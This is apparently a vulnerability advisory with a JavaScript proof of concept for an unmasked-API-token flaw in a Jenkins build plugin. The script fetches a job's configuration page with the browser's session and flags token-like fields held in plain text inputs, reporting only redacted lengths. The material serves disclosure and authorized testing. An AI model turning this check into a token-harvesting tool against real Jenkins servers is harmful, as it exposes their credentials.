Jenkins ByteGuard Build Actions Plugin 1.0 does not mask API tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them.
The following code is for security research and authorized testing only.
javascript
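// CVE-2025-64145 PoC - Information Disclosure via Unmasked API Token
// Checks whether the Jenkins ByteGuard Build Actions Plugin renders its API
// token in a plain text input on a job configuration form.
//
// Runs in a browser session on the Jenkins instance being assessed: it relies
// on DOMParser and on the session cookie sent by `credentials: 'include'`.
// Note: This PoC requires a valid Jenkins session with Job/Configure permission.
//
// Findings are reported by field name and value length only. The token itself
// is never written to the console, so running the check does not copy the
// secret into console history, screenshots or shared logs.

// Placeholder values - replace with the instance and job under review.
// (The original script referenced jenkinsUrl without ever declaring it.)
const jenkinsUrl = 'https://jenkins.example.invalid';
const jobName = 'your-target-job';

// Step 1: Build the job configuration URL. The job name is percent-encoded so
// names containing spaces or reserved characters still form a valid path.
const configUrl = `${jenkinsUrl}/job/${encodeURIComponent(jobName)}/configure`;

// Substrings that mark an input as a likely ByteGuard token field.
// 'api' is deliberately broad and can match unrelated fields; confirm each
// reported field name against the plugin's section of the form.
const TOKEN_FIELD_HINTS = ['token', 'api', 'byteguard'];

/**
 * Tells whether a form field name or ID looks like an API token field.
 * @param {string} fieldName - the input's name, or its id when it has no name
 * @returns {boolean} true when the name contains one of TOKEN_FIELD_HINTS
 */
function isCandidateField(fieldName) {
  const lowered = fieldName.toLowerCase();
  return TOKEN_FIELD_HINTS.some((hint) => lowered.includes(hint));
}

/**
 * Describes a secret without revealing it.
 * @param {string} value - the field value found in the page
 * @returns {string} a redacted summary carrying only the value's length
 */
function summarizeSecret(value) {
  return `<redacted, ${value.length} characters>`;
}

// Step 2: Fetch the configuration page
fetch(configUrl, {
  method: 'GET',
  credentials: 'include', // Include session cookies for authentication
})
  .then((response) => {
    // A 403/404 or error page must not be parsed as if it were the form:
    // it would yield a misleading "nothing found" result.
    if (!response.ok) {
      throw new Error(`Unexpected HTTP ${response.status} for ${configUrl}`);
    }
    return response.text();
  })
  .then((html) => {
    // Step 3: Parse the HTML to find unmasked API tokens
    const doc = new DOMParser().parseFromString(html, 'text/html');
    const inputs = doc.querySelectorAll('input[type="text"], input[type="password"]');
    let findings = 0;

    for (const input of inputs) {
      const name = input.name || input.id || '';
      if (!isCandidateField(name)) {
        continue;
      }
      // A token held in type="text" is shown in the clear to anyone viewing
      // the form; type="password" is what a masked field would use.
      if (input.type === 'text') {
        findings += 1;
        console.log('[!] Unmasked token found!');
        console.log('Field name:', name);
        console.log('Token value:', summarizeSecret(input.value));
      }
    }

    // Alternative: Search in raw HTML for visible token values.
    // This pattern only matches tags where the name attribute precedes a
    // non-empty value attribute, so it is a cross-check, not a replacement
    // for the DOM scan above.
    const tokenPattern = /name=["'][^"']*token[^"']*["'][^>]*value=["']([^"']+)["']/gi;
    for (const match of html.matchAll(tokenPattern)) {
      findings += 1;
      console.log('[!] Token found in HTML:', summarizeSecret(match[1]));
    }

    if (findings === 0) {
      console.log('[-] No unmasked token fields found on', configUrl);
    }
  })
  .catch((err) => {
    // Surface network, permission and parsing failures instead of leaving an
    // unhandled rejection that looks like a clean result.
    console.error('[x] Check failed:', err);
  });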